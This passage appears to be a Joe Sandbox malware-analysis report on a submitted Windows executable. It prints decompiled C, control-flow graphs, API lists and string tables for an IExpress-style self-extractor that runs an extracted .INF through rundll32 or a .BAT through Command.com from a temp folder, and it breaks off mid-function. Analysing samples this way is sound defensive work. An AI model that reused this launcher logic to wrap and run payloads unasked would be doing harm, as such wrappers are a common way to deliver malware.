                                                                                                                                                                                                                                      • Opcode ID: 3fa1d9ed387d0201d6f1b71e5e17e7e864b8e3f8f1f22007989ab548578ba51f
                                                                                                                                                                                                                                      • Instruction ID: fa11f927824dd003d4eef291af3d9245d4cec090447cbc740e9c937a24b3a231
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3fa1d9ed387d0201d6f1b71e5e17e7e864b8e3f8f1f22007989ab548578ba51f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59B1D3716083419BE720DF248945B6B7AE8AB84705F10493FFA85F62E1DB7C8D44CB5E
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 141 401b04-401b48 call 4016a0 144 401b57-401b5c 141->144 145 401b4a-401b55 141->145 146 401b62-401b7d call 401aa2 144->146 145->146 149 401bbb-401bde call 4017a1 call 406534 146->149 150 401b7f-401b81 146->150 157 401be3-401bef call 406670 149->157 152 401b84-401b89 150->152 152->152 154 401b8b-401b90 152->154 154->149 156 401b92-401b97 154->156 158 401b99-401b9d 156->158 159 401b9f-401ba2 156->159 166 401bf5-401c0d CompareStringA 157->166 167 401d8f-401d9b call 406670 157->167 158->159 161 401ba8-401bb9 call 4016a0 158->161 159->149 162 401ba4-401ba6 159->162 161->157 162->149 162->161 166->167 168 401c13-401c23 GetFileAttributesA 166->168 175 401e14-401e25 LocalAlloc 167->175 176 401d9d-401db5 CompareStringA 167->176 170 401c29-401c31 168->170 171 401d6f-401d7a 168->171 170->171 174 401c37-401c4f call 401aa2 170->174 173 401d80-401d8a call 404495 171->173 191 401eb0-401ebe call 406c80 173->191 187 401c51-401c54 174->187 188 401c6c-401c7d LocalAlloc 174->188 178 401df0-401dfb 175->178 179 401e27-401e37 GetFileAttributesA 175->179 176->175 181 401db7-401dbe 176->181 178->173 184 401e83-401e8f call 4016a0 179->184 185 401e39-401e3b 179->185 182 401dc1-401dc6 181->182 182->182 189 401dc8-401dd0 182->189 197 401e94-401ea0 call 402aa5 184->197 185->184 192 401e3d-401e5a call 4017a1 185->192 193 401c56 187->193 194 401c5c-401c67 call 401aa2 187->194 188->178 196 401c83-401c8e 188->196 195 401dd3-401dd8 189->195 192->197 211 401e5c-401e5f 192->211 193->194 194->188 195->195 201 401dda-401dee LocalAlloc 195->201 202 401c90 196->202 203 401c95-401cdc GetPrivateProfileIntA GetPrivateProfileStringA 196->203 210 401ea5-401eae 197->210 201->178 207 401dfd-401e0f call 40173e 201->207 202->203 208 401d14-401d23 203->208 209 401cde-401ce8 203->209 207->210 212 401d25-401d3d GetShortPathNameA 208->212 213 401d3f 208->213 215 401cea 209->215 216 401cef-401d0f call 4016a0 * 2 209->216 210->191 211->197 217 401e61-401e81 call 4016d3 * 2 211->217 219 401d44-401d47 212->219 213->219 215->216 216->210 217->197 223 401d49 219->223 224 401d4e-401d6a call 40173e 219->224 223->224 224->210
                                                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                                                      			E00401B04(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                                                      				char _v527;
                                                                                                                                                                                                                                      				char _v528;
                                                                                                                                                                                                                                      				char _v1552;
                                                                                                                                                                                                                                      				CHAR* _v1556;
                                                                                                                                                                                                                                      				int* _v1560;
                                                                                                                                                                                                                                      				CHAR** _v1564;
                                                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                      				signed int _t48;
                                                                                                                                                                                                                                      				CHAR* _t53;
                                                                                                                                                                                                                                      				CHAR* _t54;
                                                                                                                                                                                                                                      				char* _t57;
                                                                                                                                                                                                                                      				char* _t58;
                                                                                                                                                                                                                                      				CHAR* _t60;
                                                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                                                      				signed char _t65;
                                                                                                                                                                                                                                      				intOrPtr _t76;
                                                                                                                                                                                                                                      				intOrPtr _t77;
                                                                                                                                                                                                                                      				unsigned int _t85;
                                                                                                                                                                                                                                      				CHAR* _t90;
                                                                                                                                                                                                                                      				CHAR* _t92;
                                                                                                                                                                                                                                      				char _t105;
                                                                                                                                                                                                                                      				char _t106;
                                                                                                                                                                                                                                      				CHAR** _t111;
                                                                                                                                                                                                                                      				CHAR* _t115;
                                                                                                                                                                                                                                      				intOrPtr* _t125;
                                                                                                                                                                                                                                      				void* _t126;
                                                                                                                                                                                                                                      				CHAR* _t132;
                                                                                                                                                                                                                                      				CHAR* _t135;
                                                                                                                                                                                                                                      				void* _t138;
                                                                                                                                                                                                                                      				void* _t139;
                                                                                                                                                                                                                                      				void* _t145;
                                                                                                                                                                                                                                      				intOrPtr* _t146;
                                                                                                                                                                                                                                      				char* _t148;
                                                                                                                                                                                                                                      				CHAR* _t151;
                                                                                                                                                                                                                                      				void* _t152;
                                                                                                                                                                                                                                      				CHAR* _t155;
                                                                                                                                                                                                                                      				CHAR* _t156;
                                                                                                                                                                                                                                      				void* _t157;
                                                                                                                                                                                                                                      				signed int _t158;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t48 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                                                      				_t108 = __ecx;
                                                                                                                                                                                                                                      				_v1564 = _a4;
                                                                                                                                                                                                                                      				_v1560 = _a8;
                                                                                                                                                                                                                                      				E004016A0( &_v528, 0x104, __ecx);
                                                                                                                                                                                                                                      				if(_v528 != 0x22) {
                                                                                                                                                                                                                                      					_t135 = " ";
                                                                                                                                                                                                                                      					_t53 =  &_v528;
                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                      					_t135 = "\"";
                                                                                                                                                                                                                                      					_t53 =  &_v527;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_t111 =  &_v1556;
                                                                                                                                                                                                                                      				_v1556 = _t53;
                                                                                                                                                                                                                                      				_t54 = E00401AA2(_t111, _t135);
                                                                                                                                                                                                                                      				_t156 = _v1556;
                                                                                                                                                                                                                                      				_t151 = _t54;
                                                                                                                                                                                                                                      				if(_t156 == 0) {
                                                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                                                      					_push(_t111);
                                                                                                                                                                                                                                      					E004017A1( &_v268, 0x104, _t111, "C:\Users\Arthur\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                      					E00406534( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                      					goto L13;
                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                      					_t132 = _t156;
                                                                                                                                                                                                                                      					_t148 =  &(_t132[1]);
                                                                                                                                                                                                                                      					do {
                                                                                                                                                                                                                                      						_t105 =  *_t132;
                                                                                                                                                                                                                                      						_t132 =  &(_t132[1]);
                                                                                                                                                                                                                                      					} while (_t105 != 0);
                                                                                                                                                                                                                                      					_t111 = _t132 - _t148;
                                                                                                                                                                                                                                      					if(_t111 < 3) {
                                                                                                                                                                                                                                      						goto L12;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					_t106 = _t156[1];
                                                                                                                                                                                                                                      					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                                                      						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                                                      							goto L12;
                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                      							goto L11;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                      						L11:
                                                                                                                                                                                                                                      						E004016A0( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                      						L13:
                                                                                                                                                                                                                                      						_t138 = 0x2e;
                                                                                                                                                                                                                                      						_t57 = E00406670(_t156, _t138);
                                                                                                                                                                                                                                      						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                                                      							_t139 = 0x2e;
                                                                                                                                                                                                                                      							_t115 = _t156;
                                                                                                                                                                                                                                      							_t58 = E00406670(_t115, _t139);
                                                                                                                                                                                                                                      							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                                                      								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                                                      								if(_t156 == 0) {
                                                                                                                                                                                                                                      									goto L43;
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                                                      								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                                                      									E004016A0( &_v1552, 0x400, _t108);
                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                      									_push(_t115);
                                                                                                                                                                                                                                      									_t108 = 0x400;
                                                                                                                                                                                                                                      									E004017A1( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                                                      									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                                                      										E004016D3( &_v1552, 0x400, " ");
                                                                                                                                                                                                                                      										E004016D3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      								_t140 = _t156;
                                                                                                                                                                                                                                      								 *_t156 = 0;
                                                                                                                                                                                                                                      								E00402AA5( &_v1552, _t156, _t156);
                                                                                                                                                                                                                                      								goto L53;
                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                      								_t108 = "Command.com /c %s";
                                                                                                                                                                                                                                      								_t125 = "Command.com /c %s";
                                                                                                                                                                                                                                      								_t145 = _t125 + 1;
                                                                                                                                                                                                                                      								do {
                                                                                                                                                                                                                                      									_t76 =  *_t125;
                                                                                                                                                                                                                                      									_t125 = _t125 + 1;
                                                                                                                                                                                                                                      								} while (_t76 != 0);
                                                                                                                                                                                                                                      								_t126 = _t125 - _t145;
                                                                                                                                                                                                                                      								_t146 =  &_v268;
                                                                                                                                                                                                                                      								_t157 = _t146 + 1;
                                                                                                                                                                                                                                      								do {
                                                                                                                                                                                                                                      									_t77 =  *_t146;
                                                                                                                                                                                                                                      									_t146 = _t146 + 1;
                                                                                                                                                                                                                                      								} while (_t77 != 0);
                                                                                                                                                                                                                                      								_t140 = _t146 - _t157;
                                                                                                                                                                                                                                      								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                                                      								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                                                      								if(_t156 != 0) {
                                                                                                                                                                                                                                      									E0040173E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                                                      									goto L53;
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      								goto L43;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                      							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                      							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                                                      								_t140 = 0x525;
                                                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                                                      								_push(0x10);
                                                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                                                      								_t60 =  &_v268;
                                                                                                                                                                                                                                      								goto L35;
                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                      								_t140 = "[";
                                                                                                                                                                                                                                      								_v1556 = _t151;
                                                                                                                                                                                                                                      								_t90 = E00401AA2( &_v1556, "[");
                                                                                                                                                                                                                                      								if(_t90 != 0) {
                                                                                                                                                                                                                                      									if( *_t90 != 0) {
                                                                                                                                                                                                                                      										_v1556 = _t90;
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      									_t140 = "]";
                                                                                                                                                                                                                                      									E00401AA2( &_v1556, "]");
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                                                      								if(_t156 == 0) {
                                                                                                                                                                                                                                      									L43:
                                                                                                                                                                                                                                      									_t60 = 0;
                                                                                                                                                                                                                                      									_t140 = 0x4b5;
                                                                                                                                                                                                                                      									_push(0);
                                                                                                                                                                                                                                      									_push(0x10);
                                                                                                                                                                                                                                      									_push(0);
                                                                                                                                                                                                                                      									L35:
                                                                                                                                                                                                                                      									_push(_t60);
                                                                                                                                                                                                                                      									E00404495(0, _t140);
                                                                                                                                                                                                                                      									_t62 = 0;
                                                                                                                                                                                                                                      									goto L54;
                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                      									_t155 = _v1556;
                                                                                                                                                                                                                                      									_t92 = _t155;
                                                                                                                                                                                                                                      									if( *_t155 == 0) {
                                                                                                                                                                                                                                      										_t92 = "DefaultInstall";
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      									 *0x409120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                                                      									 *_v1560 = 1;
                                                                                                                                                                                                                                      									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x401140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                                                      										 *0x409a34 =  *0x409a34 & 0xfffffffb;
                                                                                                                                                                                                                                      										if( *0x409a40 != 0) {
                                                                                                                                                                                                                                      											_t108 = "setupapi.dll";
                                                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                                                      											_t108 = "setupx.dll";
                                                                                                                                                                                                                                      											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                      										if( *_t155 == 0) {
                                                                                                                                                                                                                                      											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                      										_push( &_v268);
                                                                                                                                                                                                                                      										_push(_t155);
                                                                                                                                                                                                                                      										E0040173E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                      										 *0x409a34 =  *0x409a34 | 0x00000004;
                                                                                                                                                                                                                                      										if( *_t155 == 0) {
                                                                                                                                                                                                                                      											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                      										E004016A0(_t108, 0x104, _t155);
                                                                                                                                                                                                                                      										_t140 = 0x200;
                                                                                                                                                                                                                                      										E004016A0(_t156, 0x200,  &_v268);
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      									L53:
                                                                                                                                                                                                                                      									_t62 = 1;
                                                                                                                                                                                                                                      									 *_v1564 = _t156;
                                                                                                                                                                                                                                      									L54:
                                                                                                                                                                                                                                      									_pop(_t152);
                                                                                                                                                                                                                                      									return E00406C80(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      			}














































                                                                                                                                                                                                                                      0x00401b0f
                                                                                                                                                                                                                                      0x00401b16
                                                                                                                                                                                                                                      0x00401b23
                                                                                                                                                                                                                                      0x00401b25
                                                                                                                                                                                                                                      0x00401b36
                                                                                                                                                                                                                                      0x00401b3c
                                                                                                                                                                                                                                      0x00401b48
                                                                                                                                                                                                                                      0x00401b57
                                                                                                                                                                                                                                      0x00401b5c
                                                                                                                                                                                                                                      0x00401b4a
                                                                                                                                                                                                                                      0x00401b4a
                                                                                                                                                                                                                                      0x00401b4f
                                                                                                                                                                                                                                      0x00401b4f
                                                                                                                                                                                                                                      0x00401b62
                                                                                                                                                                                                                                      0x00401b68
                                                                                                                                                                                                                                      0x00401b6e
                                                                                                                                                                                                                                      0x00401b73
                                                                                                                                                                                                                                      0x00401b79
                                                                                                                                                                                                                                      0x00401b7d
                                                                                                                                                                                                                                      0x00401bbb
                                                                                                                                                                                                                                      0x00401bbb
                                                                                                                                                                                                                                      0x00401bcd
                                                                                                                                                                                                                                      0x00401bde
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00401b7f
                                                                                                                                                                                                                                      0x00401b7f
                                                                                                                                                                                                                                      0x00401b81
                                                                                                                                                                                                                                      0x00401b84
                                                                                                                                                                                                                                      0x00401b84
                                                                                                                                                                                                                                      0x00401b86
                                                                                                                                                                                                                                      0x00401b87
                                                                                                                                                                                                                                      0x00401b8b
                                                                                                                                                                                                                                      0x00401b90
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00401b92
                                                                                                                                                                                                                                      0x00401b97
                                                                                                                                                                                                                                      0x00401ba2
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00401ba8
                                                                                                                                                                                                                                      0x00401ba8
                                                                                                                                                                                                                                      0x00401bb4
                                                                                                                                                                                                                                      0x00401be3
                                                                                                                                                                                                                                      0x00401be5
                                                                                                                                                                                                                                      0x00401be8
                                                                                                                                                                                                                                      0x00401bef
                                                                                                                                                                                                                                      0x00401d91
                                                                                                                                                                                                                                      0x00401d92
                                                                                                                                                                                                                                      0x00401d94
                                                                                                                                                                                                                                      0x00401d9b
                                                                                                                                                                                                                                      0x00401e21
                                                                                                                                                                                                                                      0x00401e25
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00401e2e
                                                                                                                                                                                                                                      0x00401e37
                                                                                                                                                                                                                                      0x00401e8f
                                                                                                                                                                                                                                      0x00401e3d
                                                                                                                                                                                                                                      0x00401e3d
                                                                                                                                                                                                                                      0x00401e44
                                                                                                                                                                                                                                      0x00401e53
                                                                                                                                                                                                                                      0x00401e5a
                                                                                                                                                                                                                                      0x00401e6e
                                                                                                                                                                                                                                      0x00401e7c
                                                                                                                                                                                                                                      0x00401e7c
                                                                                                                                                                                                                                      0x00401e5a
                                                                                                                                                                                                                                      0x00401e95
                                                                                                                                                                                                                                      0x00401e97
                                                                                                                                                                                                                                      0x00401ea0
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00401db7
                                                                                                                                                                                                                                      0x00401db7
                                                                                                                                                                                                                                      0x00401dbc
                                                                                                                                                                                                                                      0x00401dbe
                                                                                                                                                                                                                                      0x00401dc1
                                                                                                                                                                                                                                      0x00401dc1
                                                                                                                                                                                                                                      0x00401dc3
                                                                                                                                                                                                                                      0x00401dc4
                                                                                                                                                                                                                                      0x00401dc8
                                                                                                                                                                                                                                      0x00401dca
                                                                                                                                                                                                                                      0x00401dd0
                                                                                                                                                                                                                                      0x00401dd3
                                                                                                                                                                                                                                      0x00401dd3
                                                                                                                                                                                                                                      0x00401dd5
                                                                                                                                                                                                                                      0x00401dd6
                                                                                                                                                                                                                                      0x00401dda
                                                                                                                                                                                                                                      0x00401ddf
                                                                                                                                                                                                                                      0x00401dea
                                                                                                                                                                                                                                      0x00401dee
                                                                                                                                                                                                                                      0x00401e07
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00401e0c
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00401dee
                                                                                                                                                                                                                                      0x00401c13
                                                                                                                                                                                                                                      0x00401c1a
                                                                                                                                                                                                                                      0x00401c23
                                                                                                                                                                                                                                      0x00401d71
                                                                                                                                                                                                                                      0x00401d76
                                                                                                                                                                                                                                      0x00401d77
                                                                                                                                                                                                                                      0x00401d79
                                                                                                                                                                                                                                      0x00401d7a
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00401c37
                                                                                                                                                                                                                                      0x00401c37
                                                                                                                                                                                                                                      0x00401c3c
                                                                                                                                                                                                                                      0x00401c48
                                                                                                                                                                                                                                      0x00401c4f
                                                                                                                                                                                                                                      0x00401c54
                                                                                                                                                                                                                                      0x00401c56
                                                                                                                                                                                                                                      0x00401c56
                                                                                                                                                                                                                                      0x00401c5c
                                                                                                                                                                                                                                      0x00401c67
                                                                                                                                                                                                                                      0x00401c67
                                                                                                                                                                                                                                      0x00401c79
                                                                                                                                                                                                                                      0x00401c7d
                                                                                                                                                                                                                                      0x00401df0
                                                                                                                                                                                                                                      0x00401df0
                                                                                                                                                                                                                                      0x00401df2
                                                                                                                                                                                                                                      0x00401df7
                                                                                                                                                                                                                                      0x00401df8
                                                                                                                                                                                                                                      0x00401dfa
                                                                                                                                                                                                                                      0x00401d80
                                                                                                                                                                                                                                      0x00401d80
                                                                                                                                                                                                                                      0x00401d83
                                                                                                                                                                                                                                      0x00401d88
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00401c83
                                                                                                                                                                                                                                      0x00401c83
                                                                                                                                                                                                                                      0x00401c89
                                                                                                                                                                                                                                      0x00401c8e
                                                                                                                                                                                                                                      0x00401c90
                                                                                                                                                                                                                                      0x00401c90
                                                                                                                                                                                                                                      0x00401caa
                                                                                                                                                                                                                                      0x00401cb5
                                                                                                                                                                                                                                      0x00401cdc
                                                                                                                                                                                                                                      0x00401d14
                                                                                                                                                                                                                                      0x00401d23
                                                                                                                                                                                                                                      0x00401d3f
                                                                                                                                                                                                                                      0x00401d25
                                                                                                                                                                                                                                      0x00401d30
                                                                                                                                                                                                                                      0x00401d37
                                                                                                                                                                                                                                      0x00401d37
                                                                                                                                                                                                                                      0x00401d47
                                                                                                                                                                                                                                      0x00401d49
                                                                                                                                                                                                                                      0x00401d49
                                                                                                                                                                                                                                      0x00401d54
                                                                                                                                                                                                                                      0x00401d55
                                                                                                                                                                                                                                      0x00401d62
                                                                                                                                                                                                                                      0x00401cde
                                                                                                                                                                                                                                      0x00401cde
                                                                                                                                                                                                                                      0x00401ce8
                                                                                                                                                                                                                                      0x00401cea
                                                                                                                                                                                                                                      0x00401cea
                                                                                                                                                                                                                                      0x00401cf7
                                                                                                                                                                                                                                      0x00401d02
                                                                                                                                                                                                                                      0x00401d0a
                                                                                                                                                                                                                                      0x00401d0a
                                                                                                                                                                                                                                      0x00401ea5
                                                                                                                                                                                                                                      0x00401ead
                                                                                                                                                                                                                                      0x00401eae
                                                                                                                                                                                                                                      0x00401eb0
                                                                                                                                                                                                                                      0x00401eb3
                                                                                                                                                                                                                                      0x00401ebe
                                                                                                                                                                                                                                      0x00401ebe
                                                                                                                                                                                                                                      0x00401c7d
                                                                                                                                                                                                                                      0x00401c23
                                                                                                                                                                                                                                      0x00401bef
                                                                                                                                                                                                                                      0x00401b97

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00401C03
                                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00401C1A
                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00401C73
                                                                                                                                                                                                                                      • GetPrivateProfileIntA.KERNEL32(?,Reboot,00000000,?), ref: 00401CA4
                                                                                                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00401140,00000000,00000008,?), ref: 00401CD4
                                                                                                                                                                                                                                      • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 00401D37
                                                                                                                                                                                                                                        • Part of subcall function 00404495: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 004044F4
                                                                                                                                                                                                                                        • Part of subcall function 00404495: MessageBoxA.USER32(?,?,OxZQ,00010010), ref: 00404530
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                      • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                      • API String ID: 383838535-3300983261
                                                                                                                                                                                                                                      • Opcode ID: ba09e7273ca59a8cf49e956fd996234aae32f0232324a9987cca866755ad6610
                                                                                                                                                                                                                                      • Instruction ID: 3075e327830b4a1456db722b7b68f16567dbc160e48c0e5c7eb3f6eae83a8efb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba09e7273ca59a8cf49e956fd996234aae32f0232324a9987cca866755ad6610
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAA10770A002186BEB209B24CC44FEB7769AF45314F1442BBF555B73E1DBBCAE858A5C
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 416 405933-40596f GetCurrentDirectoryA SetCurrentDirectoryA 417 405971-40598e call 404495 call 406233 416->417 418 405993-4059d1 GetDiskFreeSpaceA 416->418 433 405bbb-405bc8 call 406c80 417->433 420 405b57-405b94 memset call 406233 GetLastError FormatMessageA 418->420 421 4059d7-405a00 MulDiv 418->421 430 405b99-405bb2 call 404495 SetCurrentDirectoryA 420->430 421->420 424 405a06-405a22 GetVolumeInformationA 421->424 427 405a24-405a66 memset call 406233 GetLastError FormatMessageA 424->427 428 405a6b-405a80 SetCurrentDirectoryA 424->428 427->430 432 405a82-405a87 428->432 444 405bb8 430->444 436 405a98-405a9a 432->436 437 405a89-405a8e 432->437 441 405a9c 436->441 442 405a9d-405aae 436->442 437->436 439 405a90-405a96 437->439 439->432 439->436 441->442 443 405aaf-405ab1 442->443 446 405ab3-405ab9 443->446 447 405abb-405abe 443->447 448 405bba 444->448 446->443 446->447 449 405ac0-405ad1 call 404495 447->449 450 405ad6-405add 447->450 448->433 449->444 452 405b08-405b11 450->452 453 405adf-405ae9 450->453 456 405b18-405b23 452->456 453->452 455 405aeb-405b06 453->455 455->456 457 405b25-405b2a 456->457 458 405b2c-405b33 456->458 459 405b3b 457->459 460 405b35-405b37 458->460 461 405b39 458->461 462 405b4c-405b55 459->462 463 405b3d-405b4a call 40268a 459->463 460->459 461->459 462->448 463->448
                                                                                                                                                                                                                                      C-Code - Quality: 96%
                                                                                                                                                                                                                                      			E00405933(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                      				char _v16;
                                                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                                                      				char _v788;
                                                                                                                                                                                                                                      				long _v792;
                                                                                                                                                                                                                                      				long _v796;
                                                                                                                                                                                                                                      				long _v800;
                                                                                                                                                                                                                                      				signed int _v804;
                                                                                                                                                                                                                                      				long _v808;
                                                                                                                                                                                                                                      				int _v812;
                                                                                                                                                                                                                                      				long _v816;
                                                                                                                                                                                                                                      				long _v820;
                                                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                      				signed int _t46;
                                                                                                                                                                                                                                      				int _t50;
                                                                                                                                                                                                                                      				signed int _t55;
                                                                                                                                                                                                                                      				void* _t66;
                                                                                                                                                                                                                                      				int _t69;
                                                                                                                                                                                                                                      				signed int _t73;
                                                                                                                                                                                                                                      				signed short _t78;
                                                                                                                                                                                                                                      				signed int _t87;
                                                                                                                                                                                                                                      				signed int _t101;
                                                                                                                                                                                                                                      				int _t102;
                                                                                                                                                                                                                                      				unsigned int _t103;
                                                                                                                                                                                                                                      				unsigned int _t105;
                                                                                                                                                                                                                                      				signed int _t111;
                                                                                                                                                                                                                                      				long _t112;
                                                                                                                                                                                                                                      				signed int _t116;
                                                                                                                                                                                                                                      				CHAR* _t118;
                                                                                                                                                                                                                                      				signed int _t119;
                                                                                                                                                                                                                                      				signed int _t120;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t114 = __edi;
                                                                                                                                                                                                                                      				_t46 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                                                      				_v804 = __edx;
                                                                                                                                                                                                                                      				_t118 = __ecx;
